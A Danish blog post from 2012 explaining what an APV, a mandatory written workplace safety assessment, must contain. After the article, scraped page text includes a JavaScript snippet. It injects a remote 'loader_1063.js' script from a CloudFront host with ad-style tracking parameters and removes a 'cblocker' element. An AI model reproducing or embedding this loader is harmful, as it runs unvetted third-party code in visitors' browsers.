Smartlog v3 » Tips, Guides & Informationer » Hvad er en apv?
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Hvad er en apv?

4. Sep 2012 13:07, webmayn

Forinden opstarten af en virksomhed, er det vigtigt at man sætter sig ind i mange forskellige forhold, og et meget vigtigt punkt på tjeklisten er at have styr på sin apv. For flere nystartede kan ordene virke ukendte, og man kan måske spørge sig selv: hvad er en apv ?

 

En apv er en skriftlig arbejdspladsvurdering, som I som virksomhed skal have udarbejdet i fællesskab mellem leder og ansatte. Man nedsætter typisk en miljørepræsentant og en arbejdsleder, som i fællesskab arbejder sammen i en arbejdsmiljøorganisation.

 

Der er forholdsvis stor metodefrihed til at udarbejde en apv, men der er fire punkter, som den skal indeholde. Først og fremmest skal arbejdsmiljøforholdene kortlægges i apv’en. Her skabes et overblik over arbejdsgange og –processer i virksomheden, og forhold som eksempelvis de fysiske, kemiske, ergonomiske og psykiske skal fremgå. Apv’en skal også indeholde en kortlægning af de arbejdsmiljøproblemer, der måtte være i den pågældende virksomhed, og disse skal beskrives og vurderes. Som en tredje ting, skal der udarbejdes en handlingsplan, hvor en prioritering af arbejdsmiljøproblemerne fremgår, samt hvem der løser disse, hvornår og hvordan. En sidste ting, der skal fremgå af apv’en, er en plan for opfølgning og retningslinjer, så den påkrævede fornyelse hver tredje år overholdes, og så der bliver fulgt op på procedurerne ved nye arbejdsgange mm. i virksomheden.

 

Apv’en er ikke kun en lovpligtig foranstaltning, for hvad en apv også fungerer som, er et opslagsværktøj for virksomhedens ansatte, så de kan finde ud af, hvilke rutiner man skal gennemgå, hvis virksomheden eksempelvis erhverver sig en ny maskine.  

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede